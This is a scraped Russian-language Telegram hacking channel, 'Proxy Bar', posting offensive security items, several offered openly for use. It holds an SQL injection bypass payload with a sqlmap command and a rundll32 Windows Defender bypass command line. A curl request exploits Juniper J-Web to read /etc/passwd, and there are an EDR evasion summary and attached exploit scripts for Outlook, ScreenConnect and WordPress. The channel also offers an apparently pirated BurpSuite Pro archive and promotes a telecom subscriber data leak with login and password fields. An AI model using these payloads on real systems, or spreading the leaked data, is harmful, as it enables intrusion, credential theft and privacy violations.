Proxy Bar – Telegram
Proxy Bar
19.5K subscribers
1.29K photos
79 videos
664 files
1.32K links
Exploits, Hacking and Leaks

Чат группы - https://news.1rj.ru/str/chat_proxy_bar

Связь с администрацией и реклама:
@NULL_vm

Поддержать проект:
BTC bc1qmrt229eghjyj9wqa7nmr9j8zuq6khz6km2pker
Download Telegram
This media is not supported in your browser
VIEW IN TELEGRAM
Xbox ? PlayStation ?
No
Ubiquiti switch !
🔥71👍7😱5👌2
Bypassing SQL
*
payload:
8%20or%207250%3d0725
*
для sqlmap:
sqlmap -u 'http://OLOLO.com/anyfile.asp?id_test=8%20or%207250%3d07250' --dbs --random-agent ignore=500 - -code=200 -T tablename --columns -- no-cast
*

#sql #bypass
👍43🔥3😱1👌1
Windows Defender Detection Mitigation Bypass Vulnerability
Win LPE
В 2022 году hyp3rlinx рассказывал как можно обойти windows defender передав дополнительный путь при ссылке на mshtml, дырку пофиксили. НО, добавив пару запятых в старый трюк - и опять bypass.
*
то есть было и пофиксили:
C:\sec>rundll32.exe javanoscript:"\..\..\mshtml,RunHTMLApplication ";alert(666)
магия запятой:
C:\sec>rundll32.exe javanoscript:"\..\..\mshtml,,RunHTMLApplication ";alert(666)
собака старая, трюки новые.
CVE пока не имеет )

#defender #bypass
🔥61👍1😱1👌1
Свежая техника обхода EDR
Кому лень читать всю статью то: техника основана на запуске малвари ДО загрузки библиотеки DLL EDR.
Суть вот в чем, EDR должен внедрить свою DLL в каждый процесс, но если внедрять слишком рано - процесс крэшится, внедрять слишком поздно - так его уже малварь подчинила.
Суммируем: нужно найти момент для загрузки малвари ЧУТЬ раньше, при инициализации процесса - тогда EDR в лохматой жопе.
*
Статья - Bypassing EDRs With EDR-Preloading
Сорцы - EDR-Preloader

#EDR #malware
🔥21
CVE-2023-36845 и CVE-2023-36846
Juniper Junos OS J-Web RCE
*
На все это дело есть и сплоит на питоне
но можно и в curlык
*
curl -kv "https ://OLOLO.com/about.php? PHPRC=/dev/fd/0" --data-binary 'auto_prepend_file="/etc/passwd"'
🔥24😱2
Грязный BASH
однострочник для быстрого обнаружения XSS в файлах PHP
*
rg --no-heading "echo.*\\\$_GET" | grep "\.php:" | grep -v -e "(\$_GET" -e "( \$_GET" -e "esc_" -e "admin_url" -e "(int)" -e htmlentities
🔥35👍8👌1
Прощай NGINX
*
ESXI умер пару дней назад
теперь и NGINX умер
Глав разраб форкнул проект и теперь будет FreeNginx
Почитайте письмо, как эффективные манагеры в очередной раз все обосрали
https://freenginx.org/pipermail/nginx/2024-February/000000.html
*
В AUR уже что то появилось

#fuck
😱32🔥11👍2👌2
cve-2024-21413_outlook_rce.sh
1.1 KB
CVE-2024-21413
Expect Script POC
*
Microsoft Outlook Remote Code Execution Vulnerability (through the preview panel) CVSS:3.1 9.8 / 8.5
*
Link
🔥16👍3
Living off the False Positive
*
Полезное.
Ну прям всем хорошо, blue team могут использовать для настройки своей логики обнаружения вторжений, а red team научиться сливаться с серой массой.
LoFP
👍6🔥4
KeyTrap in DNS (CVE-2023-50387)
*
Link
👍11🔥1👌1
burpsuite_pro_v2024.zip
692.2 MB
BurpSuite PRO version 2024.1.1.1
+BurpBountyPro_v2.8.0
ru+eng
+manual
🔥29😱5👌3👍2
Beeline потёк
😱35🔥15👌10👍3
Proxy Bar
Beeline потёк
В дампе поля:
APT41 - коменты будут ?
*
GUID
ABONENT_ID
ABONENT_NAME
LOGIN
PASSWORD
ACCOUNT_USR_BLOCK
ABONENT_BLOCK
DEVICE_BLOCK
QUESTION ANSWER
ACTIVE_DATE
DEACTIVE_DATE
PACKET_TYPE
TOWN
DEVICE
SUBSCRIBER_ID
ADDRESS_ID
*
👍21🔥1
Proxy Bar
Beeline потёк
Все эти билайны и теле2 это только верхушка айсберга и перерастает в шпионский треш, да еще и очень быстро.
Даже если просто переводить .md можно примерно прикинуть объемы затрагиваемых тем, структур, организаций и стран с их альянсами.
Ноги выросли отсюда I-S00N
В общем китайский APT-подрядчик нормально так накинул на вентилятор, от iOS Spyware до физических имплантируемых устройств.
В общем будет интересно, читаем вникаем дальше
*
Ну и да, кого в Китае расстреляют

UPDATE: хороший разбор тут с переводами скринов на английский (читать снизу вверх за последние 19 часов)


#APT
👍26
Побег из VirtualBox 7.0.10
ДЫрки в virtio-net
Почитать можно про CVE-2023-22098, CVE-2023-22099, CVE-2023-22100
*
exploit


#virtualbox #escape
🔥27😱6👌3👍1
👍13😱10👌3
Ждем exploit для ScreenConnect
👍15
Linux — это теперь и CNA
Рубрика - Интересное, проект ядра Linux был принят в качестве органа нумерации CVE (CNA) для выявления уязвимостей, обнаруженных в Linux.
Теперь еще и их мониторить
Почитать тут

#vuln #linux #security
👌10🔥2
Proxy Bar
Ждем exploit для ScreenConnect
Ну понеслась
😱6🔥2👌2
watchtowr-vs-ConnectWise_2024-02-21.py
2.6 KB
ScreenConnect POC
*
Обход аутентификации для добавления нового пользователя-администратора в ConnectWise ScreenConnect.
*
Usage:
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!
*
👍17🔥7👌2
exploit.py
6.2 KB
CVE-2024-25600 wordpress Exploit (RCE)
*
Дыра в плагине Bricks Builder
*
requirements:
alive_progress
bs4
prompt_toolkit
requests
rich

*

#RCE #wordpress
🔥21👍4👌3